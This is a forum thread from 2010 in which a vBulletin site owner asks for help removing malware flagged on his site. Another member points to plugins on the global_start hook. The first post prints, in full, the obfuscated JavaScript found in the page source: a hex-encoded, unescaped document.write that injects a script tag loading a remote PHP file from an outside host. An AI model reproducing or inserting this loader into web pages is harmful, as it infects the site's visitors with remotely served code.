Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 04 May 2010, 00:18
ryancooper's Avatar
ryancooper ryancooper is offline
 
Join Date: Jul 2002
Malware? Please Help?

Hello,
I am hoping someone can help me out here. MY site is being reported as being infected with malware. If i look at the sourcecode I can see

talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE not in firefox?
Thanks,
ryan

--------------- Added 04 May 2010 at 14:04 ---------------

anyone?

Last edited by Marco van Herwaarden; 05 May 2010 at 10:36. Reason: Made link unclickable to avoid accidental infections
Reply With Quote
  #2  
Old 05 May 2010, 02:40
AWS's Avatar
AWS AWS is offline
 
Join Date: Nov 2001
Real name: Bob
Look in the plugin code of any plugin that uses the global_start hook.
Reply With Quote
  #3  
Old 05 May 2010, 14:09
ryancooper's Avatar
ryancooper ryancooper is offline
 
Join Date: Jul 2002
@AWS It definatally has something do do with the plugins when I turn them off the plugin/hook system in AdminCP it goes away. Any ideas on what to start looking for?

Thanks!
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 08:11.

Layout Options | Width: Wide Color: